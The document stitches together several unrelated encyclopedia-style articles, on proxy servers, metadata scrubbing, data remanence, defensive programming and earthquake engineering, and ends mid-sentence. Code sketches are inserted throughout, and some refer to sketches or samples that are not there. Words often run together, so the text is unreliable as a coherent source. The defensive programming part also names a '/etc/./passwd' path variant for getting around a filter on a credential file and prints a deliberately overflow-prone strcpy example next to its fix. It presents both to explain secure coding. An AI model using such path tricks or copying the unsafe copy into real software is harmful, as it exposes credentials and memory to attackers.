An anonymous proxy server (sometimes called a web proxy) generally attempts to anonymize web surfing. Anonymizers may be differentiated into several varieties. The destination server (the server that ultimately satisfies the web request) receives requests from the anonymizing proxy server and thus does not receive information about the end user's address. The requests are not anonymous to the anonymizing proxy server, however, so a degree of trust is present between the proxy server and the user. Many proxy servers are funded through a continued advertising link to the user.

Access control: some proxy servers implement a logon requirement. In large organizations, authorized users must log on to gain access to the web. The organization can thereby track usage by individuals. Some anonymizing proxy servers may forward data packets with header lines such as HTTP_VIA, HTTP_X_FORWARDED_FOR, or HTTP_FORWARDED, which may reveal the IP address of the client. Other anonymizing proxy servers, known as elite or high-anonymity proxies, make it appear that the proxy server is the client. A website could still suspect a proxy is being used if the client sends packets that include a cookie from a previous visit that did not use the high-anonymity proxy server. Clearing cookies, and possibly the cache, would solve this problem.

Advertisers use proxy servers for validating, checking and quality assurance of geotargeted ads. A geotargeting ad server checks the request source IP address and uses a geo-IP database to determine the geographic source of requests.[16] Using a proxy server that is physically located inside a specific country or city gives advertisers the ability to test geotargeted ads.

A proxy can keep the internal network structure of a company secret by using network address translation, which can help the security of the internal network.[17] This makes requests from machines and users on the local network anonymous. Proxies can also be combined with firewalls. An incorrectly configured proxy can provide access to a network otherwise isolated from the Internet.[4]

Proxies allow web sites to make web requests to externally hosted resources (e.g. images, music files, etc.) when cross-domain restrictions prohibit the web site from linking directly to the outside domains. Proxies also allow the browser to make web requests to externally hosted content on behalf of a website when cross-domain restrictions (in place to protect websites from the likes of data theft) prohibit the browser from directly accessing the outside domains. Secondary market brokers use web proxy servers to circumvent restrictions on online purchases of limited products such as limited sneakers[18] or tickets.

Web proxies forward HTTP requests. The request from the client is the same as a regular HTTP request except the full URL is passed, instead of just the path.[19] This request is sent to the proxy server, which makes the request specified and returns the response. Some web proxies allow the HTTP CONNECT method to set up forwarding of arbitrary data through the connection; a common policy is to forward only port 443, to allow HTTPS traffic.
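The difference in the request line is easy to see on the wire. In the sketch below, the first form is what a client sends directly to an origin server, while the second is the absolute-URL form sent to a web proxy (the proxy address is a placeholder, matching the relay sketched earlier):

```python
import socket

# Origin-form request line, as sent to the web server itself:
direct = b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"

# Absolute-form request line, as sent to a forward web proxy: the full
# URL is included so the proxy knows which origin server to contact.
via_proxy = b"GET http://example.com/index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"

with socket.create_connection(("127.0.0.1", 8888)) as s:  # hypothetical proxy address
    s.sendall(via_proxy)
    print(s.recv(4096).decode(errors="replace"))
```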
Examples of web proxy servers include Apache (with mod_proxy or Traffic Server), HAProxy, IIS configured as a proxy (e.g., with Application Request Routing), Nginx, Privoxy, Squid, Varnish (reverse proxy only), WinGate, Ziproxy, Tinyproxy, RabbIT and Polipo. For clients, the problem of complex or multiple proxy servers is solved by a client-server proxy auto-config protocol (PAC file). SOCKS also forwards arbitrary data after a connection phase, and is similar to HTTP CONNECT in web proxies.

Also known as an intercepting proxy, inline proxy, or forced proxy, a transparent proxy intercepts normal application layer communication without requiring any special client configuration. Clients need not be aware of the existence of the proxy. A transparent proxy is normally located between the client and the Internet, with the proxy performing some of the functions of a gateway or router.[20] RFC 2616 (Hypertext Transfer Protocol—HTTP/1.1) offers standard definitions: "A 'transparent proxy' is a proxy that does not modify the request or response beyond what is required for proxy authentication and identification"; "a 'non-transparent proxy' is a proxy that modifies the request or response in order to provide some added service to the user agent, such as group annotation services, media type transformation, protocol reduction, or anonymity filtering".

TCP Intercept is a traffic-filtering security feature that protects TCP servers from TCP SYN flood attacks, which are a type of denial-of-service attack. TCP Intercept is available for IP traffic only. In 2009, a security flaw in the way that transparent proxies operate was published by Robert Auger,[21] and the Computer Emergency Response Team issued an advisory listing dozens of affected transparent and intercepting proxy servers.[22]

Intercepting proxies are commonly used in businesses to enforce acceptable use policies and to ease administrative overhead, since no client browser configuration is required. This second reason, however, is mitigated by features such as Active Directory group policy, or DHCP and automatic proxy detection. Intercepting proxies are also commonly used by ISPs in some countries to save upstream bandwidth and improve customer response times by caching. This is more common in countries where bandwidth is more limited (e.g. island nations) or must be paid for.

The diversion or interception of a TCP connection creates several issues. First, the original destination IP and port must somehow be communicated to the proxy. This is not always possible (e.g., where the gateway and proxy reside on different hosts). There is a class of cross-site attacks that depend on certain behaviors of intercepting proxies that do not check or have access to information about the original (intercepted) destination. This problem may be resolved by using an integrated packet-level and application-level appliance or software which is then able to communicate this information between the packet handler and the proxy. Intercepting also creates problems for HTTP authentication, especially connection-oriented authentication such as NTLM, as the client browser believes it is talking to a server rather than a proxy. This can cause problems where an intercepting proxy requires authentication, and the user then connects to a site that also requires authentication. Finally, intercepting connections can cause problems for HTTP caches, as some requests and responses become uncacheable by a shared cache.
In integrated firewall/proxy servers where the router/firewall is on the same host as the proxy, communicating original destination information can be done by any method, for example Microsoft TMG or WinGate. Interception can also be performed using Cisco's WCCP (Web Cache Communication Protocol). This proprietary protocol resides on the router and is configured from the cache, allowing the cache to determine what ports and traffic are sent to it via transparent redirection from the router. This redirection can occur in one of two ways: GRE tunneling (OSI layer 3) or MAC rewrites (OSI layer 2). Once traffic reaches the proxy machine itself, interception is commonly performed with NAT (network address translation). Such setups are invisible to the client browser, but leave the proxy visible to the web server and other devices on the Internet side of the proxy. Recent Linux and some BSD releases provide TPROXY (transparent proxy), which performs IP-level (OSI layer 3) transparent interception and spoofing of outbound traffic, hiding the proxy IP address from other network devices. Several methods may be used to detect the presence of an intercepting proxy server.

A CGI web proxy accepts target URLs using a web form in the user's browser window, processes the request, and returns the results to the user's browser. Consequently, it can be used on a device or network that does not allow "true" proxy settings to be changed. The first recorded CGI proxy, named "rover" at the time but renamed in 1998 to "CGIProxy",[25] was developed by American computer scientist James Marshall in early 1996 for an article in "Unix Review" by Rich Morin.[26] The majority of CGI proxies are powered by one of CGIProxy (written in the Perl language), Glype (written in the PHP language), or PHProxy (written in the PHP language). As of April 2016, CGIProxy has received about two million downloads, Glype has received almost a million downloads,[27] whilst PHProxy still receives hundreds of downloads per week.[28] Despite waning in popularity[29] due to VPNs and other privacy methods, as of September 2021 there are still a few hundred CGI proxies online.[30]

Some CGI proxies were set up for purposes such as making websites more accessible to disabled people, but have since been shut down due to excessive traffic, usually caused by a third party advertising the service as a means to bypass local filtering. Since many of these users do not care about the collateral damage they are causing, it became necessary for organizations to hide their proxies, disclosing the URLs only to those who take the trouble to contact the organization and demonstrate a genuine need.[31]

A suffix proxy allows a user to access web content by appending the name of the proxy server to the URL of the requested content (e.g. "en.wikipedia.org.SuffixProxy.com"). Suffix proxy servers are easier to use than regular proxy servers, but they do not offer high levels of anonymity, and their primary use is for bypassing web filters. However, this is rarely used due to more advanced web filters.

Tor is a system intended to provide online anonymity.[32] Tor client software routes Internet traffic through a worldwide volunteer network of servers to conceal a user's computer location or usage from someone conducting network surveillance or traffic analysis. Using Tor makes tracing Internet activity more difficult,[32] and is intended to protect users' personal freedom and their online privacy.
"Onion routing" refers to the layered nature of the encryption service: The original data are encrypted and re-encrypted multiple times, then sent through successive Tor relays, each one of which decrypts a "layer" of encryption before passing the data on to the next relay and ultimately the destination. This reduces the possibility of the original data being unscrambled or understood in transit.[33] TheI2P anonymous network('I2P') is a proxy network aiming atonline anonymity. It implementsgarlic routing, which is an enhancement of Tor's onion routing. I2P is fully distributed and works by encrypting all communications in various layers and relaying them through a network of routers run by volunteers in various locations. By keeping the source of the information hidden, I2P offers censorship resistance. The goals of I2P are to protect users' personal freedom, privacy, and ability to conduct confidential business. Each user of I2P runs an I2P router on their computer (node). The I2P router takes care of finding other peers and building anonymizing tunnels through them. I2P provides proxies for all protocols (HTTP,IRC, SOCKS, ...). The proxy concept refers to a layer-7 application in theOSI reference model.Network address translation(NAT) is similar to a proxy but operates in layer 3. In the client configuration of layer-3 NAT, configuring the gateway is sufficient. However, for the client configuration of a layer-7 proxy, the destination of the packets that the client generates must always be the proxy server (layer 7), then the proxy server reads each packet and finds out the true destination. Because NAT operates at layer 3, it is less resource-intensive than the layer-7 proxy, but also less flexible. As we compare these two technologies, we might encounter a terminology known as 'transparent firewall'.Transparent firewallmeans that the proxy uses the layer-7 proxy advantages without the knowledge of the client. The client presumes that the gateway is a NAT in layer 3, and it does not have any idea about the inside of the packet, but through this method, the layer-3 packets are sent to the layer-7 proxy for investigation.[citation needed] ADNSproxy server takes DNS queries from a (usually local) network and forwards them to an Internet Domain Name Server. It may also cache DNS records. Some client programs "SOCKS-ify" requests,[34]which allows adaptation of any networked software to connect to external networks via certain types of proxy servers (mostly SOCKS). A residential proxy is an intermediary that uses a real IP address provided by anInternet Service Provider (ISP)with physical devices such asmobilesandcomputers of end-users. Instead of connecting directly to aserver, residential proxy users connect to the target through residential IP addresses. The target then identifies them as organic internet users. It does not let any tracking tool identify the reallocation of the user.[35]Any residential proxy can send any number of concurrent requests, and IP addresses are directly related to a specific region.[36]Unlike regular residential proxies, which hide the user's real IP address behind another IP address, rotating residential proxies, also known asbackconnect proxies, conceal the user's real IP address behind a pool of proxies. 
Unlike regular residential proxies, which hide the user's real IP address behind another IP address, rotating residential proxies, also known as backconnect proxies, conceal the user's real IP address behind a pool of proxies. These proxies switch between themselves at every session or at regular intervals.[37] Despite providers' assertions that the proxy hosts participate voluntarily, numerous proxies are operated on potentially compromised hosts, including Internet of things devices. By cross-referencing the hosts, researchers have identified and analyzed logs that have been classified as potentially unwanted programs and exposed a range of unauthorized activities conducted by RESIP hosts. These activities encompassed illegal promotion, fast fluxing, phishing, hosting malware, and more.[38]
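The DNS proxying described earlier can be sketched as a small UDP forwarder. The version below (addresses are placeholders) naively caches responses keyed on the raw question and ignores record TTLs, which a real DNS proxy must honour:

```python
import socket

LISTEN = ("127.0.0.1", 5353)    # local resolver address (placeholder)
UPSTREAM = ("9.9.9.9", 53)      # upstream DNS server (placeholder)
cache: dict[bytes, bytes] = {}  # raw question section -> raw response

def serve() -> None:
    """Forward DNS queries over UDP, caching responses by question."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as srv:
        srv.bind(LISTEN)
        while True:
            query, client = srv.recvfrom(512)
            key = query[12:]  # question section, past the 12-byte header
            if key in cache:
                # Reuse the cached answer, but echo the client's transaction ID.
                srv.sendto(query[:2] + cache[key][2:], client)
                continue
            with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as up:
                up.settimeout(3.0)
                up.sendto(query, UPSTREAM)
                response, _ = up.recvfrom(4096)
            cache[key] = response
            srv.sendto(response, client)

serve()
```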
https://en.wikipedia.org/wiki/Proxy_server
A metadata removal tool or metadata scrubber is a type of privacy software built to protect the privacy of its users by removing potentially privacy-compromising metadata from files before they are shared with others, e.g., by sending them as e-mail attachments or by posting them on the Web.[1][2]

Metadata can be found in many types of files, such as documents, spreadsheets, presentations, images, and audio files. It can include information such as details on the file authors, file creation and modification dates, geographical location, document revision history, thumbnail images, and comments.[3] Metadata may be added to files by users, but some metadata is often automatically added by authoring applications or by the devices used to produce the files, without user intervention. Since metadata is sometimes not clearly visible in authoring applications (depending on the application and its settings), there is a risk that the user will be unaware of its existence or will forget about it and, if the file is shared, private or confidential information will inadvertently be exposed. The purpose of metadata removal tools is to minimize the risk of such data leakage.[4]

The metadata removal tools that exist today can be divided into four groups. To securely delete the metadata of a PDF file, it is important to linearize the PDF file afterwards; otherwise the changes are reversible and the metadata can be recovered.[5][6]

Metadata removal tools are also commonly used to reduce the overall sizes of files, particularly image files posted on the Web. For example, a small image on a website, which may contain metadata including a thumbnail image, can easily contain as much metadata as image data, so removing that metadata can halve the file size.
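For images, one common scrubbing approach is to re-encode only the pixel data, leaving EXIF blocks, thumbnails and comments behind. A minimal sketch, assuming the third-party Pillow library is installed; note that re-saving a JPEG this way is lossy, and dedicated scrubbers handle many more formats:

```python
from PIL import Image  # third-party: pip install Pillow

def strip_image_metadata(src: str, dst: str) -> None:
    """Copy only the pixel data into a fresh image, dropping EXIF,
    embedded thumbnails, comments and other metadata blocks."""
    with Image.open(src) as img:
        clean = Image.new(img.mode, img.size)
        clean.putdata(list(img.getdata()))
        clean.save(dst)

strip_image_metadata("photo.jpg", "photo_clean.jpg")
```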
https://en.wikipedia.org/wiki/Metadata_removal_tool
Data remanenceis the residual representation ofdigital datathat remains even after attempts have been made to remove or erase the data. This residue may result from data being left intact by a nominalfile deletionoperation, by reformatting of storage media that does not remove data previously written to the media, or through physical properties of thestorage mediathat allow previously written data to be recovered. Data remanence may make inadvertent disclosure ofsensitive informationpossible should the storage media be released into an uncontrolled environment (e.g., thrown in the bin (trash) or lost). Various techniques have been developed to counter data remanence. These techniques are classified asclearing,purging/sanitizing, ordestruction. Specific methods includeoverwriting,degaussing,encryption, andmedia destruction. Effective application of countermeasures can be complicated by several factors, including media that are inaccessible, media that cannot effectively be erased, advanced storage systems that maintain histories of data throughout the data's life cycle, and persistence of data in memory that is typically considered volatile. Severalstandardsexist for the secure removal of data and the elimination of data remanence. Manyoperating systems,file managers, and other software provide a facility where afileis not immediatelydeletedwhen the user requests that action. Instead, the file is moved to aholding area(i.e. the "trash"), making it easy for the user to undo a mistake. Similarly, many software products automatically create backup copies of files that are being edited, to allow the user to restore the original version, or to recover from a possible crash (autosavefeature). Even when an explicit deleted file retention facility is not provided or when the user does not use it, operating systems do not actually remove the contents of a file when it is deleted unless they are aware that explicit erasure commands are required, like on asolid-state drive. (In such cases, the operating system will issue theSerial ATATRIMcommand or theSCSIUNMAP command to let the drive know to no longer maintain the deleted data.) Instead, they simply remove the file's entry from thefile systemdirectorybecause this requires less work and is therefore faster, and the contents of the file—the actual data—remain on thestorage medium. The data will remain there until theoperating systemreuses the space for new data. In some systems, enough filesystemmetadataare also left behind to enable easyundeletionby commonly availableutility software. Even when undelete has become impossible, the data, until it has been overwritten, can be read by software that readsdisk sectorsdirectly.Computer forensicsoften employs such software. Likewise,reformatting,repartitioning, orreimaginga system is unlikely to write to every area of the disk, though all will cause the disk to appear empty or, in the case of reimaging, empty except for the files present in the image, to most software. Finally, even when the storage media is overwritten, physical properties of the media may permit recovery of the previous contents. In most cases however, this recovery is not possible by just reading from the storage device in the usual way, but requires using laboratory techniques such as disassembling the device and directly accessing/reading from its components.[citation needed] § Complicationsbelow gives further explanations for causes of data remanence. 
There are three levels commonly recognized for eliminating remnant data:

Clearing is the removal of sensitive data from storage devices in such a way that there is assurance that the data may not be reconstructed using normal system functions or software file/data recovery utilities. The data may still be recoverable, but not without special laboratory techniques.[1] Clearing is typically an administrative protection against accidental disclosure within an organization. For example, before a hard drive is re-used within an organization, its contents may be cleared to prevent their accidental disclosure to the next user.

Purging or sanitizing is the physical rewrite of sensitive data from a system or storage device done with the specific intent of rendering the data unrecoverable at a later time.[2] Purging, proportional to the sensitivity of the data, is generally done before releasing media beyond control, such as before discarding old media or moving media to a computer with different security requirements.

Destruction renders the storage media unusable for conventional equipment. The effectiveness of destroying the media varies by medium and method. Depending on the recording density of the media and/or the destruction technique, this may leave data recoverable by laboratory methods. Conversely, destruction using appropriate techniques is the most secure method of preventing retrieval.

A common method used to counter data remanence is to overwrite the storage media with new data. This is often called wiping or shredding a disk or file, by analogy to common methods of destroying print media, although the mechanism bears no similarity to these. Because such a method can often be implemented in software alone, and may be able to selectively target only part of the media, it is a popular, low-cost option for some applications. Overwriting is generally an acceptable method of clearing, as long as the media is writable and not damaged.

The simplest overwrite technique writes the same data everywhere, often just a pattern of all zeros. At a minimum, this will prevent the data from being retrieved simply by reading from the media again using standard system functions. The UEFI firmware in modern machines may offer an ATA-class disk erase function as well; the ATA-6 standard governs Secure Erase specifications. BitLocker provides whole-disk encryption, so its contents are illegible without the key; writing a fresh GPT then allows a new file system to be established. The old blocks appear empty, but reading them at the LBA level yields only illegible ciphertext, while newly written data is unaffected and works normally.

In an attempt to counter more advanced data recovery techniques, specific overwrite patterns and multiple passes have often been prescribed. These may be generic patterns intended to eradicate any trace signatures; an example is the seven-pass pattern 0xF6, 0x00, 0xFF, <random byte>, 0x00, 0xFF, <random byte>, sometimes erroneously attributed to the US standard DOD 5220.22-M. A sketch of such a pass sequence appears below.

One challenge with overwriting is that some areas of the disk may be inaccessible, due to media degradation or other errors. Software overwrite may also be problematic in high-security environments, which require stronger controls on data commingling than the software in use can provide. The use of advanced storage technologies may also make file-based overwrite ineffective (see the related discussion below under § Complications).

There are specialized machines and software that are capable of performing overwriting. The software can sometimes be a standalone operating system specifically designed for data destruction. There are also machines specifically designed to wipe hard drives to the U.S. Department of Defense specification DoD 5220.22-M.[3]
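The multi-pass pattern quoted above can be sketched directly; the helper name is hypothetical, and, as the surrounding text explains, journaling, wear levelling and remapped sectors may all leave copies that such a file-level overwrite cannot reach:

```python
import os
import secrets

# The seven-pass sequence quoted above; None marks a random-byte pass.
PASSES = [b"\xF6", b"\x00", b"\xFF", None, b"\x00", b"\xFF", None]

def overwrite_file(path: str) -> None:
    """Overwrite a file in place with the seven-pass pattern above.

    Caveat: journaling, copy-on-write, wear levelling and remapped bad
    blocks can all leave remnants this cannot reach.
    """
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for pattern in PASSES:
            f.seek(0)
            data = secrets.token_bytes(size) if pattern is None else pattern * size
            f.write(data)
            f.flush()
            os.fsync(f.fileno())  # push each pass to the device, not just the page cache

overwrite_file("draft.txt")
```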
Writing zeros to every block of a hard disk or SSD has the advantage of allowing the firmware to deploy spare blocks when bad blocks are identified. BitLocker has the advantage that the data is illegible without the key. SeaTools and other tools can erase disks by writing zeros; this is typically used to revive old consumer-class disks, but they can wipe server disks as well, albeit slowly. Modern 28 TB and larger disks have an enormous number of LBA48 blocks; 40 TB and 60 TB disks will take proportionately longer to wipe.

Peter Gutmann investigated data recovery from nominally overwritten media in the mid-1990s. He suggested magnetic force microscopy may be able to recover such data, and developed specific patterns, for specific drive technologies, designed to counter it.[4] These patterns have come to be known as the Gutmann method. Gutmann's belief in the possibility of data recovery is based on many questionable assumptions and factual errors that indicate a low level of understanding of how hard drives work.[5]

Daniel Feenberg, an economist at the private National Bureau of Economic Research, claims that the chances of overwritten data being recovered from a modern hard drive amount to "urban legend".[6] He also points to the "18+1⁄2-minute gap" Rose Mary Woods created on a tape of Richard Nixon discussing the Watergate break-in. Erased information in the gap has not been recovered, and Feenberg claims doing so would be an easy task compared to recovery of a modern high-density digital signal.

As of November 2007, the United States Department of Defense considers overwriting acceptable for clearing magnetic media within the same security area/zone, but not as a sanitization method. Only degaussing or physical destruction is acceptable for the latter.[7] On the other hand, according to the 2014 NIST Special Publication 800-88 Rev. 1 (p. 7): "For storage devices containing magnetic media, a single overwrite pass with a fixed pattern such as binary zeros typically hinders recovery of data even if state of the art laboratory techniques are applied to attempt to retrieve the data."[8] An analysis by Wright et al. of recovery techniques, including magnetic force microscopy, also concludes that a single wipe is all that is required for modern drives. They point out that the long time required for multiple wipes "has created a situation where many organizations ignore the issue [altogether] – resulting in data leaks and loss."[9]

Degaussing is the removal or reduction of a magnetic field of a disk or drive, using a device called a degausser that has been designed for the media being erased. Applied to magnetic media, degaussing may purge an entire media element quickly and effectively. Degaussing often renders hard disks inoperable, as it erases the low-level formatting that is only done at the factory during manufacturing. In some cases, it is possible to return the drive to a functional state by having it serviced at the manufacturer. However, some modern degaussers use such a strong magnetic pulse that the motor that spins the platters may be destroyed in the degaussing process, and servicing may not be cost-effective. Degaussed computer tape such as DLT can generally be reformatted and reused with standard consumer hardware. In some high-security environments, one may be required to use a degausser that has been approved for the task.
For example, inUSgovernment and military jurisdictions, one may be required to use a degausser from theNSA's "Evaluated Products List".[10] Encryptingdata before it is stored on the media may mitigate concerns about data remanence. If thedecryption keyis strong and carefully controlled, it may effectively make any data on the media unrecoverable. Even if the key is stored on the media, it may prove easier or quicker tooverwritejust the key, versus the entire disk. This process is calledcrypto-shredding. Encryption may be done on afile-by-filebasis, or on thewhole disk.Cold boot attacksare one of the few possible methods for subverting afull-disk encryptionmethod, as there is no possibility of storing the plain text key in an unencrypted section of the medium. See the sectionComplications: Data in RAMfor further discussion. Otherside-channel attacks(such askeyloggers, acquisition of a written note containing the decryption key, orrubber-hose cryptanalysis) may offer a greater chance of success, but do not rely on weaknesses in the cryptographic method employed. As such, their relevance for this article is minor. Thorough destruction of the underlying storage media is the most certain way to counter data remanence. However, the process is generally time-consuming, cumbersome, and may require extremely thorough methods, as even a small fragment of the media may contain large amounts of data. Specific destruction techniques include: Storage media may have areas which become inaccessible by normal means. For example,magnetic disksmay develop newbad sectorsafter data has been written, and tapes require inter-record gaps. Modernhard disksoften feature reallocation of marginal sectors or tracks, automated in a way that theoperating systemwould not need to work with it. The problem is especially significant insolid-state drives(SSDs) that rely on relatively large relocated bad block tables. Attempts to counter data remanence byoverwritingmay not be successful in such situations, as data remnants may persist in such nominally inaccessible areas. Data storage systems with more sophisticated features may makeoverwriteineffective, especially on a per-file basis. For example,journaling file systemsincrease the integrity of data by recording write operations in multiple locations, and applyingtransaction-like semantics; on such systems, data remnants may exist in locations "outside" the nominal file storage location. Some file systems also implementcopy-on-writeor built-inrevision control, with the intent that writing to a file never overwrites data in-place. Furthermore, technologies such asRAIDandanti-fragmentationtechniques may result in file data being written to multiple locations, either by design (forfault tolerance), or as data remnants. Wear levelingcan also defeat data erasure, by relocating blocks between the time when they are originally written and the time when they are overwritten. For this reason, some security protocols tailored to operating systems or other software featuring automatic wear leveling recommend conducting a free-space wipe of a given drive and then copying many small, easily identifiable "junk" files or files containing other nonsensitive data to fill as much of that drive as possible, leaving only the amount of free space necessary for satisfactory operation of system hardware and software. 
As storage and system demands grow, the "junk data" files can be deleted as necessary to free up space; even if the deletion of "junk data" files is not secure, their initial nonsensitivity reduces to near zero the consequences of recovery of data remanent from them.[citation needed] Asoptical mediaare not magnetic, they are not erased by conventionaldegaussing.Write-onceoptical media (CD-R,DVD-R, etc.) also cannot be purged by overwriting. Rewritable optical media, such asCD-RWandDVD-RW, may be receptive tooverwriting. Methods for successfully sanitizing optical discs includedelaminatingor abrading the metallic data layer, shredding, incinerating, destructive electrical arcing (as by exposure to microwave energy), and submersion in a polycarbonate solvent (e.g.,acetone). Research from the Center for Magnetic Recording and Research, University of California, San Diego has uncovered problems inherent in erasing data stored onsolid-state drives(SSDs). Researchers discovered three problems with file storage on SSDs:[11] First, built-in commands are effective, but manufacturers sometimes implement them incorrectly. Second, overwriting the entire visible address space of an SSD twice is usually, but not always, sufficient to sanitize the drive. Third, none of the existing hard drive-oriented techniques for individual file sanitization are effective on SSDs.[11]: 1 Solid-state drives, which are flash-based, differ from hard-disk drives in two ways: first, in the way data is stored; and second, in the way the algorithms are used to manage and access that data. These differences can be exploited to recover previously erased data. SSDs maintain a layer of indirection between the logical addresses used by computer systems to access data and the internal addresses that identify physical storage. This layer of indirection hides idiosyncratic media interfaces and enhances SSD performance, reliability, and lifespan (seewear leveling), but it can also produce copies of the data that are invisible to the user and that a sophisticated attacker could recover. For sanitizing entire disks, sanitize commands built into the SSD hardware have been found to be effective when implemented correctly, and software-only techniques for sanitizing entire disks have been found to work most, but not all, of the time.[11]: section 5In testing, none of the software techniques were effective for sanitizing individual files. These included well-known algorithms such as theGutmann method,US DoD 5220.22-M, RCMP TSSIT OPS-II, Schneier 7 Pass, and Secure Empty Trash on macOS (a feature included in versions OS X 10.3-10.9).[11]: section 5 TheTRIMfeature in many SSD devices, if properly implemented, will eventually erase data after it is deleted,[12][citation needed]but the process can take some time, typically several minutes. Many older operating systems do not support this feature, and not all combinations of drives and operating systems work.[13] Data remanence has been observed instatic random-access memory(SRAM), which is typically considered volatile (i.e., the contents degrade with loss of external power). In one study,data retentionwas observed even at room temperature.[14] Data remanence has also been observed indynamic random-access memory(DRAM). Modern DRAM chips have a built-in self-refresh module, as they not only require a power supply to retain data, but must also be periodically refreshed to prevent their data contents from fading away from the capacitors in their integrated circuits. 
A study found data remanence in DRAM with data retention of seconds to minutes at room temperature and "a full week without refresh when cooled with liquid nitrogen."[15]The study authors were able to use acold boot attackto recover cryptographickeysfor several popularfull disk encryptionsystems, including MicrosoftBitLocker, AppleFileVault,dm-cryptfor Linux, andTrueCrypt.[15]: 12 Despite some memory degradation, authors of the above described study were able to take advantage of redundancy in the way keys are stored after they have been expanded for efficient use, such as inkey scheduling. The authors recommend that computers be powered down, rather than be left in a "sleep" state, when not in physical control of the owner. In some cases, such as certain modes of the software program BitLocker, the authors recommend that a boot password or a key on a removable USB device be used.[15]: 12TRESORis akernelpatchfor Linux specifically intended to preventcold boot attackson RAM by ensuring that encryption keys are not accessible from user space and are stored in the CPU rather than system RAM whenever possible. Newer versions of the disk encryption softwareVeraCryptcan encrypt in-RAM keys and passwords on 64-bit Windows.[16]
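The crypto-shredding idea discussed earlier, destroying a small key instead of overwriting large media, can be illustrated with a toy example, assuming the third-party cryptography package:

```python
from cryptography.fernet import Fernet  # third-party: pip install cryptography

# Encrypt everything before it ever touches the media.
key = Fernet.generate_key()  # held in a controlled key store, never on the data media
token = Fernet(key).encrypt(b"customer records")

# Normal operation: data is recoverable while the key exists.
assert Fernet(key).decrypt(token) == b"customer records"

# Crypto-shredding: destroying this one small key (here merely dropped;
# a real system would securely overwrite it in the key store) renders
# every copy of the ciphertext, including backups, remapped sectors and
# wear-levelled blocks, unrecoverable without touching the media itself.
key = None
```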
https://en.wikipedia.org/wiki/Data_remanence
Defensive programming is a form of defensive design intended to develop programs that are capable of detecting potential security abnormalities and making predetermined responses.[1] It ensures the continuing function of a piece of software under unforeseen circumstances. Defensive programming practices are often used where high availability, safety, or security is needed. Defensive programming is an approach to improve software and source code in terms of general quality, comprehensibility of the source code, and predictable behavior despite unexpected inputs or user actions. Overly defensive programming, however, may safeguard against errors that will never be encountered, thus incurring run-time and maintenance costs.

Secure programming is the subset of defensive programming concerned with computer security. Security is the concern, not necessarily safety or availability (the software may be allowed to fail in certain ways). As with all kinds of defensive programming, avoiding bugs is a primary objective; however, the motivation is not as much to reduce the likelihood of failure in normal operation (as if safety were the concern), but to reduce the attack surface: the programmer must assume that the software might be misused actively to reveal bugs, and that bugs could be exploited maliciously. Consider a C function that copies untrusted input into a fixed 1000-character buffer: it will result in undefined behavior when the input is over 1000 characters. Some programmers may not feel that this is a problem, supposing that no user will enter such a long input. This particular bug demonstrates a vulnerability which enables buffer overflow exploits; a bounded copy fixes it, as shown in the sketch at the end of this section.

Offensive programming is a category of defensive programming, with the added emphasis that certain errors should not be handled defensively. In this practice, only errors from outside the program's control are to be handled (such as user input); the software itself, as well as data from within the program's line of defense, are to be trusted in this methodology.

Among defensive programming techniques is the reuse of existing code: if existing code is tested and known to work, reusing it may reduce the chance of bugs being introduced. However, reusing code is not always good practice. Reuse of existing code, especially when widely distributed, can allow for exploits to be created that target a wider audience than would otherwise be possible, and brings with it all the security and vulnerabilities of the reused code. When considering using existing source code, a quick review of the modules (sub-sections such as classes or functions) will help eliminate or make the developer aware of any potential vulnerabilities and ensure it is suitable to use in the project.[citation needed]

Before reusing old source code, libraries, APIs, configurations and so forth, it must be considered whether the old work is valid for reuse, or if it is likely to be prone to legacy problems. Legacy problems are problems inherent when old designs are expected to work with today's requirements, especially when the old designs were not developed or tested with those requirements in mind. Many software products have experienced notable problems with old legacy source code.

Malicious users are likely to invent new kinds of representations of incorrect data. For example, if a program attempts to reject accessing the file "/etc/passwd", a cracker might pass another variant of this file name, like "/etc/./passwd". Canonicalization libraries can be employed to avoid bugs due to non-canonical input.

Assume that code constructs that appear to be problem-prone (similar to known vulnerabilities, etc.) are bugs and potential security flaws.
The basic rule of thumb is: "I'm not aware of all types of security exploits. I must protect against those I do know of, and then I must be proactive!" These three rules about data security describe how to handle any data, internally or externally sourced:

"All data is important until proven otherwise" means that all data must be verified as garbage before being destroyed.

"All data is tainted until proven otherwise" means that all data must be handled in a way that does not expose the rest of the runtime environment without verifying integrity.

"All code is insecure until proven otherwise", while a slight misnomer, does a good job of reminding us never to assume our code is secure, as bugs or undefined behavior may expose the project or system to attacks such as common SQL injection attacks.
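The code samples this article refers to do not survive in this text; the following is a minimal reconstruction, in C, of the classic example as it is commonly given, with the unbounded and bounded copies side by side:

```c
#include <stdio.h>
#include <string.h>

char buffer[1000];

/* Risky: strcpy copies until the NUL terminator, so input longer than
   999 characters overruns `buffer`: undefined behavior and a classic
   buffer-overflow vector. */
void copy_input_unsafe(const char *input) {
    strcpy(buffer, input);
}

/* Defensive version: never write past the end of the buffer, and keep
   the result NUL-terminated regardless of the input length. */
void copy_input_safe(const char *input) {
    strncpy(buffer, input, sizeof(buffer) - 1);
    buffer[sizeof(buffer) - 1] = '\0';
}

int main(void) {
    copy_input_safe("hello");
    printf("%s\n", buffer);
    return 0;
}
```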
https://en.wikipedia.org/wiki/Defensive_programming
Earthquake engineeringis aninterdisciplinarybranch of engineering that designs and analyzesstructures, such asbuildingsandbridges, withearthquakesin mind. Its overall goal is to make such structures more resistant to earthquakes. An earthquake (or seismic) engineer aims to construct structures that will not be damaged in minor shaking and will avoid serious damage orcollapsein a major earthquake. Aproperly engineered structuredoes not necessarily have to be extremely strong or expensive. It has to be properly designed to withstand the seismic effects while sustaining an acceptable level of damage. Earthquake engineering is a scientific field concerned with protecting society, the natural environment, and the man-made environment from earthquakes by limiting theseismic risktosocio-economicallyacceptable levels.[1]Traditionally, it has been narrowly defined as the study of the behavior of structures and geo-structures subject toseismic loading; it is considered as a subset ofstructural engineering,geotechnical engineering,mechanical engineering,chemical engineering,applied physics, etc. However, the tremendous costs experienced in recent earthquakes have led to an expansion of its scope to encompass disciplines from the wider field ofcivil engineering,mechanical engineering,nuclear engineering, and from thesocial sciences, especiallysociology,political science,economics, andfinance.[2][3] The main objectives of earthquake engineering are: Seismic loadingmeans application of an earthquake-generated excitation on a structure (or geo-structure). It happens at contact surfaces of a structure either with the ground,[6]with adjacent 